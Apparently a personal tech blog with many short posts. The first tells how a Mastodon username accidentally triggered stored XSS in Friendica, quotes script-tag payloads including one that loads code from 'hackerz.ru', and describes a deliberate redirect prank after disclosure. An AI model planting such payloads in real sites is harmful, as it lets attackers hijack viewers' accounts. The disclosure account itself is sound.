Accidentally Hacking the Planet

Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

<script type="text/javascript">alert("I was here.");</script>

Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

<script>alert("Tek");</script>

Then I laughed about it with my geeky friends and promptly forgot all about the joke.

And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

  • An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
  • The attack was simple: I changed my username to a bit of valid JavaScript.
  • All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
  • My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
<script src="https://hackerz.ru/badstuff.js">Hi</script>
  • The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.

That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.

The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2

My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>

It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.

  1. Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎

  2. Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎

Favorite apps: PastePal

I used to think the Copied clipboard manager for Apple devices was spiffy. I don’t know how or why, but that app disappeared from the Internet and the App Stores.

PastePal seems to be its spiritual successor. It works perfectly, it syncs across devices, and the pro version is a one-time, reasonable $15 purchase. It’s the only clipboard manager I’ve found that checks all those boxes.

Pianos.

I worked as a software developer with a strongly opinionated manager. He believed that we’d achieve Peak Programmer Productivity™️ by standardizing on one common desktop setup. Of course, that meant we’d all be writing Python code in Eclipse or some other similar abomination that he liked that month. This is for him.

From now on, we’ll all play the piano. This nonsense of everyone knowing a different instrument is costing us time and money. I’ve played the piano for years, and I know you’re going to like it.

Yes, you too, violinists. Vibrato? In my time as a pianist, I’ve never needed it.

Drums? A piano is a percussion instrument. How many kinds of percussion do we need? What’s that? No, they’re not that different. Tempo, rhythms, yes, yes, we’ll still have all that.

Huh, woodwinds. Good point. Well, there are more percussion and string players than woodwind…ists, so they can figure something out.

OK, we’re getting sidetracked here. Look, this is going to be good for you, too! There are more pianos than violins – yes, and clarinets… what’s that? Yes, and probably trumpets, too. Anyway, there are a lot of pianos. The next place you go will probably have a piano, so you’ll have a leg up if you ever leave here. Not that you would, am I right? But see, I’m only thinking of your careers.

Yes, I know we’re picking my favorite instrument. That’s a coincidence. I’ve looked into lots of instruments, but we can all agree that pianos have certain advantages that… Who threw that? Indoor voices, please! Anyway, I’ve looked into lots of instruments… no, I haven’t ever played a flute, but you’ll find that… no, I will not be shoving a piano there, thank you very much!

Alright, meeting’s over. Pianos. That’s what we’re all using, starting — hey, I don’t appreciate that language. Let’s all act like professional adults here.

Pianos.

eero + Firewalla = perfection

I built our home Wi-Fi network on eero Pro 6 mesh routers. It’s great. I love it. It works as advertised. If your household is like most others, where no one has specific highly technical needs, stop reading this and buy an eero system. I’ve recommended them to my friends and family with lots of happy feedback.

However, our needs are specific and highly technical. Making and fixing computer networks is a significant chunk of my job. Information security is another huge chunk of it. We host servers in our house. And soon, our ISP1 will upgrade our Internet connection from 1Gbps to 10Gbps. eero has a few issues that complicate these uses:

  1. A persistent DHCP bug gives out the gateway eero’s own IP as a DNS server (where it acts as a proxy), even if I configure custom DNS servers. This means that when I had a Pi-hole, most requests appeared to come from the eero itself and not the individual devices. Forget applying custom blocking policies to specific devices because there’s no way to distinguish them.
  2. Hairpin NAT regularly breaks. If a device uses DNS to connect to a machine behind the eero gateway, say with Plex on an iPad configured to watch videos stored on a home server, it often works when I bring that device home and connect it to the same Wi-Fi as that server. For a while, at least. And then it won’t until I remembered to reboot the whole network.
  3. The eero Pro 6 unit only has gigabit Ethernet jacks. If your Internet connection is faster than that, too bad. The newer eero Pro 6E units have single 2.5Gbps Ethernet jacks, which is almost worse. Although the gateway eero itself can have a 2.5Gbps Internet connection, it can’t share the full speed of that connection with any other device.
  4. Its firewall settings are limited. I can either allow all remote hosts to connect to a specific port on an internal server, or not allow any hosts. I can’t define rules like “allow connections to port 8080 from host A.B.C.D”, or “block connections from North Korea”. In practice, this means I have to set the eero to allow all traffic, then configure another firewall app on my server to enforce more tailored rules.

Enter the Firewalla Gold Plus. It’s a freestanding firewall device with 4 2.5Gbps Ethernet jacks, and a phone (and web!) user interface that is as easy to use as eero’s. I’ve plugged the Firewalla directly into our Internet connection, and the eero gateway plugs into the Firewalla. I put the eero network into bridge mode so it only has to handle the Wi-Fi mesh network. The Firewalla assumed all routing and firewall duties. The setup works perfectly:

  1. Firewalla’s DHCP is more configurable and works correctly. Its DNS incorporates a lot of Pi-hole’s functions like ad blocking and local DNS.
  2. Hairpin NAT works perfectly, or at least it hasn’t broken yet in the few weeks since we got the device. I can connect to myserver.example.com from my living room as easily as from Starbucks without reconfiguring anything when I travel between those networks.
  3. I don’t have the equipment to test Firewalla’s highest throughput yet. The box could max out at 1.1Gbps for all I could prove today. However, I doubt it. I can run benchmarks that pass 1Gbps of traffic in through 1 port and out through another without effort. Even if the Firewalla could only pass exactly 2.500Gbps through to the Internet connection, that would allow devices connected to the eero gateway to download at its current full 1Gbps speed while the new, separate wired LAN is also pulling another 1.5Gbps through it. For future improvement, it can bond pairs of Ethernet ports together to act as 5Gbps ports. That’s not the top speed of the 10Gbps Internet connection, but it’s faster than any devices I own today.
  4. The firewall settings are vastly more sophisticated. I can open inbound ports to specific IPs or subnets, named groups of hosts, or geographical regions. I can also block outbound connections. And unlike with eero, I get a detailed report of blocked and allowed connections.

If I didn’t host a home server, or if I weren’t quite so super-nitpicky about security settings, or if our brilliant ISP wasn’t upgrading our connection from “hella fast” to “that’s just ridiculous”, our eero network would be fine as-is. I still happily recommend it to everyone I know. And despite my few complaints, I didn’t need to add a Firewalla to our working system. That said, I’m happy I did. It elevated our already excellent little network to blissfulness.

  1. If you live somewhere with Sonic Internet access, get it. Their service is fast, inexpensive, reliable, doesn’t have data caps, and supports net neutrality↩︎

Wake up, little sunshine

I prompted ChatGPT with: “Write a song I can sing to my son to get him awake and moving to get ready for school.”

It replied with:

Verse 1
Wake up, little sunshine
There’s a new day dawning
You’ve got a big adventure
It’s time to get moving

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Verse 2
Stretch out your arms and legs
Take a deep breath and smile
You’ll make new friends today
And learn so much in a while

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Bridge
The world is waiting for you
To see all that you can do
So let’s start this day together
And make it great, no matter the weather

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Outro
Wake up, little sunshine
It’s time to start your day
With a bright new adventure
You’ll find your own way.

Said son, who is 15, seemed to appreciate me waking him up by belting this out in full operatic tenor. I’m almost sure of it, despite any shouting to the contrary.

The Internet is a rough neighborhood

This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

A screenshot of blocked inbound connection attempts, originating from all over the world.

Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.

“I run my service on a custom port!” Doesn’t matter.

“I use IPv6!” Doesn’t matter.

“I’m just a nobody!” Doesn’t matter.

Practice safer networking, every time, all the time.

Fox News fired Tucker Carlson

However it’s spun, Fox News fired Tucker Carlson. Carlson had the most popular cable news show by a wide margin, and it’s inconceivable that Fox would simply “part ways” with their highest earner, with zero notice, without cause.

Hint: it’s never good to cost your employer a billion dollars — not that Carlson is the only miscreant at Fox.

Integrate Things with Focus

I use the Things task manager to keep track of what I need to do. I use the Focus pomodoro timer to help myself focus on a task that I’m actively working on.

Focus integrates well with another task manager, OmniFocus: you can drag an action from OmniFocus into Focus to create a task to work on, and that task will have a button that links back to the original OmniFocus action. Super convenient! It doesn’t play well with Things, though. If you try the same process, you’ll end up with multiple separate actions for each of the Things to-do’s various properties.

For example, this to-do has the title, note, checklist, tags, when, and deadline options filled in:

A Things to-do with lots of options set

Dragging it to Focus creates a whole mess of random tasks:

Focus with 8 unrelated tasks

That’s not helpful. We can do better.

First, I wrote a shortcut using Things’s shiny new Shortcuts actions. For each to-do currently selected in Things, it uses Focus’s URL scheme to create a Focus task with the item’s title, notes, and due date, and a link back to the item in Things.

Second, I made a Keyboard Maestro hot key macro, available only in Things, that executes my shortcut. When I select the to-do item above and press “option-F”, I get one single task with all the details set:

Focus with 1 well-configured task

If I click the link icon next to the task’s title, Things opens with that to-do selected.

Ta-da! The workflow is slightly different than with OmniFocus, but only a little bit, and the result is just as useful.

Apple won't totally block unwanted emails

Apple’s email apps and services don’t allow users to completely block senders. If someone is sending you messages you don’t want to receive, tough. You’re going to get them.

The iCloud.com website’s Mail app doesn’t have a sender block mechanism. Instead, it offers a way to create rules based on each message’s attributes, such as its sender. Rules support these actions:

  • Move to Folder
  • Move to Trash
  • Forward to
  • Mark as Read
  • Move to Folder and Mark as Read
  • Move to Trash and Mark as Read
  • Forward to an Email Address and Mark as Read

None of those actions are the same as bouncing or silently discarding an email. At most, you can have the email sent to your Trash folder.

Mail.app on a Mac allows you to mark senders as “blocked”. You can configure Mail.app’s junk mail filters to either “Mark [their message] as blocked mail, but leave it in my Inbox” or “Move it to the Trash”. Again, you can’t bounce or discard it.

I tried to be clever and write an AppleScript program to delete messages from my Mac’s Trash folder. That was a dead end because AppleScript’s idea of deleting an email is moving it to Trash, even if it’s already in there. Neither does it offer a way to automatically empty the trash.

Apple, this is disappointing. If I’m blocking someone, I don’t want to hear from them at all, ever. It’s not enough to send their messages to the Trash folder. I don’t want them to be in my email account at all.

Upgrade your Raspberry Pi with an SSD

I upgraded my Raspberry Pi to use an external SSD drive instead of its built-in SD card reader. If you use your little computer for anything non-trivial, so should you.

For boring old dd sequential reads, the SSD is several times faster than the SD card:

Read More →

A Boston Terrier Married a Cat

I prompted ChatGPT: “Write a Shakespearean sonnet about a Boston terrier marrying a cat.”

It replied:

“Oh, wondrous sight! A terrier and cat
In love, declaring bonds that none can break
Though some may scoff, and others may bark flat
Their love is true, not just a mere mistake

The terrier, bold and loyal as can be
Protects his feline bride with all his might
And she, with purrs and nuzzles, shows with glee
That this odd couple won’t give up the fight

They nap together, groom each other’s fur
And playfully chase one another around
To some, their pairing might seem quite absurd
But their love for each other knows no bound

So let them wed, and let their love be strong
For true love, no matter who, can’t be wrong”

Our inevitable robot overlords can write delightful poetry. We’re in trouble.

Easily copy file contents with ForkLift

I use the ForkLift 3 file manager on my Mac. Part of my job involves copying-and-pasting the contents of various files into web forms. I made a trivial little shell script so ForkLift can help me:

#!/bin/sh

if [ ${#@} -ne 1 ]; then
    echo "Expected exactly 1 filename."
    exit -1
fi   

pbcopy < $1

Then I created a new “Tool” called “Contents to Clipboard” that calls the script with the name of the selected file.

/Users/me/bin/copy_contents.sh $SOURCE_SELECTION_PATHS

Now I can select a file, select the Commands > Contents to Clipboard menu, and voila! The file’s contents are ready to be pasted into another app.

Recovering a Raspberry Pi password on an M1 Mac

I would never accidentally change my Raspberry Pi’s account password before clicking “save” in my password manager, therefore locking myself out. But let’s say, hypothetically, that I did. How would I get back into my account?

The process would look like:

  • Power off the Raspberry Pi.
  • Eject its SD card.
  • Put the SD card in my M1 Mac.
  • Magically replace the Pi’s /etc/shadow file with the previous /etc/shadow- version, undoing the password change.
  • Put the SD card back in my Pi.
  • Power up, log in, and pat myself on the back.

Hypothetically, that magic bit could be a pain in the neck.

False start #1: ext4fuse

The relevant part of the Pi’s SD card is formatted with the ext4 filesystem. macOS doesn’t natively support ext4, and I’d need to install software so that I could access and edit the files on the card.

First, I’d install the open source ext4fuse program and navigate to the Pi’s /etc directory. Only then would I realize that ext4fuse is a read-only filesystem and doesn’t support writing at all.

False start #2: extFS for Mac

If the open source option didn’t work, I’d try the paid extFS for Mac filesystem and use its trial offer to do the work.

After installation, I’d discover that something in the way that the Pi formats its SD card prevents extFS from mounting it.

False start #3: run Debian in a VirtualBox VM

I bet by then I’d give up on mounting the filesystem inside macOS, and accept that it’d be easier to do the work inside a Linux VM. I’d likely hold my nose and download Oracle’s VirtualBox. Bummer that it doesn’t work well on M1 Macs yet, which I’d learn would cause the Debian installer to reboot every couple of minutes.

Success at last: Parallels Desktop

After trying and ruling out everything else, I’d probably try the trial version of Parallels Desktop. I’d use it to install Debian, then go to the Devices > USB & Bluetooth > Apple SDXC Reader Media (disk6) menu to mount the Pi’s SD card inside the VM. Then I’d open the VM’s Terminal app and run:

cd /media/parallels/root/etc
sudo mv shadow shadow.bak
sudo cp shadow- shadow

Finally, I’d go into the VM’s Files app and unmount the “boot”, “root”, and “SETTINGS” disks.

Crossing my fingers

After all that, I’d pop the card out, stick it back in the Raspberry Pi, boot it, log in via SSH, and run sudo -s. At the password prompt, I’d type my original password (as stored in my password manager), then exhale in relief as I was once again able to log in.

That is, if I were to lock myself out in the first place. Which I never would. Because I’m a professional.

I watched the Tyre Nichols video

I watched the Tyre Nichols video. I didn’t want to because I knew what it was going to contain and dreaded the idea of seeing it, but I felt obligated to. A man died at the hands of the authorities, and as a citizen, I should witness what our government is doing. Even if — especially if — that government is accused of committing horrible acts.

I’m not glad I saw it. I wish I could un-see it. I don’t resent anyone else who doesn’t want to see it. There’s no lesser way to describe it: Demetrius Haley, Tadarrius Bean, Emmitt Martin III, Desmond Mills Jr., and Justin Smith murdered Nichols. Yes, he initially ran from the traffic stop. He should not have done that. But running from a traffic stop is not and should not be a capital offense that warrants the death penalty. After the officers had him safely detained, they proceeded to tase, pepper spray, kick, punch, and use a baton to beat him to death while he called for his mom. Anyone who claims to have seen that video and says that he deserved it or defends the officers’ actions in any way is either lying about seeing it, an irredeemable bootlicker, or a sociopath.

I grew up with the privilege of not fearing the police. Sure, I didn’t want them around if I was getting up to mischief, but I believed the worst that could happen was that they’d catch me and a court would punish me for it. Nichols didn’t have that privilege. He was right to be afraid of his police, and although it’s easy for me to say that he shouldn’t have run from them, it turned out that his fears were justified.

My travel project template

In an older post, I talked about making a project template for trip planning. The goal is to build a comprehensive list of everything I might want to prepare, pack, or do before, during, or after a business or vacation trip. Before I made this template, I was more anxious: Did I forget to do anything? Do I have everything I need? What am I missing? Now I can relax and concentrate on the fun times ahead.

Friends have asked me for my list to use as a starting point for their own, and this is that lightly annotated list. Regrets from past adventures inspired every item. The moment I’ve booked a trip, I copy this template into my to-do app, then delete everything that doesn’t apply this time. For instance, if I’m going to visit family, I can use their pillow instead of packing my own. If I’m going to Chicago in winter, I don’t need swimming trunks. If I’m traveling for personal reasons, I may not take my work laptop. It’s much easier to remove items I don’t need than to scramble to remember the things I do need.

As always, the “update the travel template” action near the bottom is the critical feedback loop that makes this all work. Every time I’ve wished I’d done or packed something, I made a reminder to add it to the list for the next time. If I were to start over with a new template having that as the only item, after a few trips that template would look a lot like this one.

As soon as travel is planned

  • Schedule time off at work 1
  • Call the vet to make pet boarding arrangements

Three weeks before travel

  • Ensure airline has TSA Pre✓ info

One week before travel

  • Notify the bank about travel 2
  • Buy travel toothpaste
  • Buy disposable razors
  • Buy travel shaving cream

Two days before travel

  • Get passports from safe
  • Check in to flight
  • Get $40 from an ATM 3
  • Download reading material 4
  • Stop eating spicy food 5

Day before travel

  • Charge the USB battery 6
  • Pack pants
  • Pack shirts
  • Pack undershirts
  • Pack underwear
  • Pack socks
  • Pack shoes
  • Pack jacket
  • Pack sandals
  • Pack shorts
  • Pack belts
  • Pack a wearing-around hat 7
  • Pack swim trunks
  • Pack a sun hat
  • Pack a sun shirt
  • Pack gaffers tape 8
  • Pack water bottle
  • Download podcasts and meditations 9
  • Pack dopp kit 10
    • $20 bill
    • Brush/comb
    • Hair gel
    • Deodorant
    • Bottle of shampoo
    • Bar of soap
    • Razor
    • Shaving cream
    • Toothbrush
    • Toothpaste
    • Floss
    • Lip balm
    • Nail clippers
    • Sewing kit
    • Safety pins
    • Curtain clips 11
    • Eye lotion
    • Meds and vitamins
    • Q-tips
    • Eye drops
    • Gold Bond powder 12
  • Pack first aid kit
    • Band-aids
    • Blister bandages 13
    • Ibuprofen
    • Melatonin 14
    • Allergy meds
    • Indigestion medicine

Night before travel

  • Put passport card in bag
  • Put backup credit card in bag 15
  • Set wake-up alarm
  • Charge laptop
  • Charge iPhone
  • Charge iPad
  • Charge Apple Watch
  • Charge AirPods
  • Charge Switch
  • Remove TSA-unfriendly stuff from bag 16
  • Pack USB battery
  • Pack passport book in suitcase 15
  • Pack handkerchief
  • Pack food bar
  • Pack AirPods
  • Pack Switch
  • Pack magazine for plane 4
  • Pack boarding passes
  • Pack sunglasses
  • Pack journal

Day of travel

  • Wear my Apple Watch
  • Turn on Fog of World 17
  • Set the thermostat to vacation mode 18
  • Pack laptop charger
  • Pack iPhone charging cable
  • Pack iPad charging cable
  • Pack Apple Watch charging cable
  • Pack USB charger’s charging cable
  • Pack AirPods charging cable
  • Pack multi-device charger
  • Pack laptop
  • Pack iPhone
  • Pack iPad
  • Pack pillow
  • Buy airport stickers 19

The day before return

  • Check in to return flight

The day of return

  • Buy airport stickers
  • Set the thermostat to normal mode
  • Put away passports
  • Update the travel template 20

After return

  • Submit travel reimbursement request 21
  • Look for travel reimbursement check 22

  1. This seems obvious but I always forget. ↩︎

  2. If you don’t do this, your bank may see transactions from an unusual location and freeze your debit or credit card. ↩︎

  3. I’ve never regretted having walking around money while traveling. ↩︎

  4. If I didn’t have something to read on a flight, I’d lose my mind. ↩︎ ↩︎

  5. Yes, the Thai curry native-extra-hot is delicious. Do you really want to be trapped in a plane while your stomach tries to digest it? ↩︎

  6. I take a plug-in charging block and a portable USB battery. If my phone is running low in the middle of a long flight, I can still charge it with the battery. ↩︎

  7. It’s vacation. I want to throw on a hat to step out for coffee or breakfast. ↩︎

  8. Ideal for covering obnoxiously bright power LEDs in hotel rooms, blocking light under the door, etc. ↩︎

  9. If it’s too bumpy to read, it’s nice to have something fun or relaxing to listen to. ↩︎

  10. See “Building the Perfect Dopp Kit”. ↩︎

  11. Hotel curtains never seem to close all the way. Bend them to your will. ↩︎

  12. Ever been rained on, had to walk around a lot in wet pants, and gotten chafed from it? Yeah, me neither. ↩︎

  13. “Ow, these new shoes are killing my feet and I’m walking way more than usual.” ↩︎

  14. Jet lag. Strange hotel. Travel excitement. These add up to difficulty sleeping. ↩︎

  15. Carry at least 2 forms of ID and 2 forms of payment in 2 separate places. If 1 set gets stolen, you still have the other to get home. ↩︎ ↩︎

  16. I have a tiny multi-tool in my EDC bag, and I don’t want the TSA to confiscate it. ↩︎

  17. This is a fun little app that records everywhere you’ve been. ↩︎

  18. Save money not heating or cooling your house as much while you’re away from it. ↩︎

  19. I collect them for my carryon suitcase. This is in here twice in case I have a different layover on the way home. ↩︎

  20. I take notes of things I wish I’d done or packed. When I get home I immediately update the list so that I won’t forget next time. ↩︎

  21. Do it while you still have all the receipts in one place. ↩︎

  22. Once the office has reimbursed me, the trip is officially done. ↩︎

Muradin wallet doesn't block RFID

My wife bought me a cool Muradin RFID-blocking wallet for Christmas. I like it a lot, except for the fact that it doesn’t actually block RFID if you use it as advertised.

The wallet has a roomy inside “cage” for storing cards, and an external pocket for storing your “frequently used card”:

The wallet with a credit card in the outside pocket.

That’s not just my interpretation of the photo. The site goes on to explicitly say that the outside pocket is for your card:

A credit card in the "FUC (frequently used card) exterior pocket"

But what does our handy dandy Flipper Zero think of the wallet’s claim? Not much. It had no trouble reading the numbers off my debit card in the “FUC exterior pocket”:

A Flipper Zero showing redacted credit card info.

To see if orientation mattered, I rotated my card 180º and tried again. It didn’t matter:

A Flipper Zero showing more redacted credit card info.

I went on to test with single cards inside the inner compartment. If the card was against the back of the wallet, as far as possible from the protective flap, the Flipper Zero couldn’t detect it.

If the card was on top of some non-RFID contents, like a few folded dollar bills, so that it was about halfway down inside the inner compartment, I could tell with about 90% reliability whether the card was a Visa or American Express:

A Visa card is inside the wallet. Now an American Express card is inside the wallet.

If the card was on top of several pieces of non-RFID content, and pushed up to the top of the inner compartment, I could scan its number through the “RFID-blocking” wallet about 50% of the time, depending on the card.

This wallet doesn’t work. Its RFID-blocking claim is somewhere between misleading and an outright lie. Don’t buy it.

Happy 2023!

2022 was a whirlwind of disasters, plagues, wars, elections, recession, inflation, and other stressors. It was a challenging year. If it had a theme, it would be “oh, now what?” However, we survived it, even if bruised and scarred.

This year is going to be better. I know it.

Happy 2023!

SteerMouse makes my Logitech mouse better

I bought a Logitech MX Vertical Wireless Mouse last year. The mouse itself remains delightful and my carpal tunnel aches have disappeared. I’m a fan.

Logitech’s “Options” (and newer “Options+”) driver software isn’t as lovely. Besides its odd issues, such as old versions being incompatible with FileVault, it’s a “large” app for something that mainly maps button presses to actions. It has a jarring, non-Mac-like interface, and supports a lot of features I’ll never use.

Enter SteerMouse. Let’s get the price out of the way: yes, I’m talking about a $20 app to replace the free one that comes with my mouse. It’s worth it. SteerMouse only configures the mouse speed, button-to-action mapping things, and other directly mouse-related settings, and it does it well. It’s installed as a System Settings pane, looking and feeling almost like it shipped with the computer. Unlike Options, it doesn’t like to call home to its maker (thanks, Little Snitch!), and it lets me map the top button to a helpful action (instead of using it to switch between 2 speed settings, which I never once did).

In short, buy it. It’s better, lighter, more native, and more private than Logitech’s software. Even at $20, I recommend it.

Audrey Auden's "The Voice in All"

I read Audrey Auden’s new book, “The Voice in All”, the first in her new “The Artifex and the Muse” series. Auden creates a lush, complex world filled with interesting, multifaceted residents. Tantalizing glimpses of science fiction sneak into the fantasy setting, hinting at a rich universe for the rest of the series. “The Voice in All” packs a surprising amount of development and story into a quick, fun book. Auden’s piqued my interest and I’m looking forward to the next installments.